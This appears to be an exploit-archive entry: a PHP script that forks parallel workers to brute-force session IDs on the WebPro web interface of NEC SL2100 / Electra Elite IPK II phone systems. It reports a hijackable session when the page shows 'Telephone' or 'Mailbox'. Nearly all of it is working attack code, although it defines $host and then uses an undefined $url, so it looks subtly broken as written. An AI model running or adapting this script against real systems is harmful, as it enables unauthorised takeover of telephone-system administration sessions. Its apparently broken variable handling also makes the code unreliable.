63 lines
No EOL
1.5 KiB
Text
63 lines
No EOL
1.5 KiB
Text
# Title: NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
|
|
# Author: Cold z3ro
|
|
# Date: 2020-05-04
|
|
# Homepage: https://www.0x30.cc/
|
|
# Vendor Homepage: https://www.nec.com
|
|
# Version: 01.03.01
|
|
# Discription: NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration
|
|
|
|
<?php
|
|
set_time_limit(0);
|
|
|
|
$host = "192.168.0.14";
|
|
|
|
$start = 100;
|
|
$end = 30000;
|
|
$maxproc= 50;
|
|
$execute=0;
|
|
|
|
echo "\n[+] NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration\n\n";
|
|
sleep(3);
|
|
for ($i = $start; $i <= $end; $i++)
|
|
{
|
|
|
|
$pid = @pcntl_fork();
|
|
$execute++;
|
|
if ($execute >= $maxproc)
|
|
{
|
|
while (pcntl_waitpid(0, $status) != -1)
|
|
{
|
|
$status = pcntl_wexitstatus($status);
|
|
$execute =0;
|
|
usleep(3000);
|
|
}
|
|
}
|
|
if (!$pid)
|
|
{
|
|
echo $url . " checking $i\n";
|
|
login($url, $i);
|
|
flush();
|
|
exit;
|
|
}
|
|
}
|
|
|
|
|
|
function login($url, $key)
|
|
{
|
|
$ch = curl_init();
|
|
curl_setopt($ch, CURLOPT_URL, $url .'/PyxisUaMenu.htm?sessionId='.$key.'&MAINFRM(444,-1,591)#');
|
|
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
|
|
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
|
|
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80);
|
|
curl_setopt($ch, CURLOPT_TIMEOUT, 80);
|
|
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
|
|
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
|
|
curl_setopt($ch, CURLOPT_HEADER, FALSE);
|
|
$content = curl_exec($ch);
|
|
curl_close ($ch);
|
|
if(preg_match('/Telephone/i', $content) || preg_match('/Mailbox/i', $content))
|
|
{
|
|
die("\n\n[+][-]".$url."/PyxisUaMenu.htm?sessionId=".$key."&MAINFRM(444,-1,591)# => Found\n\n");
|
|
|
|
}
|
|
} |